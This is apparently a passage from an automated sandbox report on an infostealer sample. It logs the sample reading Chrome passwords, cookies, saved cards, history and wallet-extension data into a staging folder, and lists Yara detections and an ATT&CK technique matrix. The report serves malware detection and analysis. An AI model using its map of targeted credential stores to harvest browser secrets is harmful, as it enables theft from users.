                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\stink\Chrome Default Passwords.db VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\stink\Chrome Default Cookies.db VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\stink\Browsers\Chrome\Default Cookies.txt VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\stink\Chrome Default Cards.db VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\stink\Chrome Default History.db VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\stink\Browsers\Chrome\Default History.txt VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Bookmarks VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Bookmarks VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Bookmarks VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Bookmarks VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Bookmarks VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\stink\Chrome Default Bookmarks VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\stink\Chrome Default Bookmarks VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\stink\Chrome Default Bookmarks VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\manifest.json VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\manifest.json VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\manifest.json VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\manifest.json VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\stink\Browsers\Chrome\Default Extensions.txt VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\stink VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\Desktop\file.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\stink\System\Configuration.txt VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\Desktop\file.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\stink\System VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\stink\System\Processes.txt VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\Desktop\file.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\stink\System VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\stink\System\monitor-1.png VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\Desktop\file.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041DCF0 _wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,GetSystemTimeAsFileTime,GetCurrentProcessId,GetTempPathW,GetCommandLineW,CommandLineToArgvW,abort,abort,0_2_0041DCF0

                        Stealing of Sensitive Information

                        barindex
                        Source: Yara matchFile source: 1.0.test.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 2.2.test.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 6.0.test.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.0.test.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.0.test.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.0.test.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.2.test.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.test.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 6.2.test.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 2.0.test.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.2.test.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.2.test.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000003.00000002.219390859.00000000005FE000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000002.219363316.00000000005FE000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000000.209539589.00000000005FE000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000000.212189614.00000000005FE000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000002.230098238.00000000005FE000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000000.209057269.00000000005FE000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000000.210593944.00000000005FE000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000000.211333071.00000000005FE000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000000.207348284.00000000005FE000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.235504122.0000000002666000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.219304449.00000000005FE000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000002.219197373.00000000005FE000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.219282036.00000000005FE000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe, type: DROPPED
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BookmarksJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior

                        Remote Access Functionality

                        barindex
                        Source: Yara matchFile source: 1.0.test.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 2.2.test.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 6.0.test.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.0.test.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.0.test.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.0.test.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.2.test.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.test.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 6.2.test.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 2.0.test.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.2.test.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.2.test.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000003.00000002.219390859.00000000005FE000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000002.219363316.00000000005FE000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000000.209539589.00000000005FE000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000000.212189614.00000000005FE000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000002.230098238.00000000005FE000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000000.209057269.00000000005FE000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000000.210593944.00000000005FE000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000000.211333071.00000000005FE000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000000.207348284.00000000005FE000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.235504122.0000000002666000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.219304449.00000000005FE000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000002.219197373.00000000005FE000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.219282036.00000000005FE000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe, type: DROPPED
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 1_2_00007FFD3FBE2B5D bind,WSAGetLastError,1_2_00007FFD3FBE2B5D
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 2_2_00007FFD3FBE2B5D bind,WSAGetLastError,2_2_00007FFD3FBE2B5D
                        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                        Valid Accounts1
                        Native API
                        1
                        DLL Side-Loading
                        11
                        Process Injection
                        1
                        Masquerading
                        1
                        OS Credential Dumping
                        1
                        System Time Discovery
                        Remote Services1
                        Archive Collected Data
                        Exfiltration Over Other Network Medium1
                        Web Service
                        Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                        Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                        DLL Side-Loading
                        11
                        Process Injection
                        LSASS Memory21
                        Security Software Discovery
                        Remote Desktop Protocol1
                        Data from Local System
                        Exfiltration Over Bluetooth11
                        Encrypted Channel
                        Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                        Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
                        Deobfuscate/Decode Files or Information
                        Security Account Manager1
                        Process Discovery
                        SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
                        Ingress Tool Transfer
                        Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)2
                        Obfuscated Files or Information
                        NTDS1
                        Remote System Discovery
                        Distributed Component Object ModelInput CaptureScheduled Transfer3
                        Non-Application Layer Protocol
                        SIM Card SwapCarrier Billing Fraud
                        Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                        DLL Side-Loading
                        LSA Secrets1
                        System Network Configuration Discovery
                        SSHKeyloggingData Transfer Size Limits14
                        Application Layer Protocol
                        Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                        Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain Credentials1
                        File and Directory Discovery
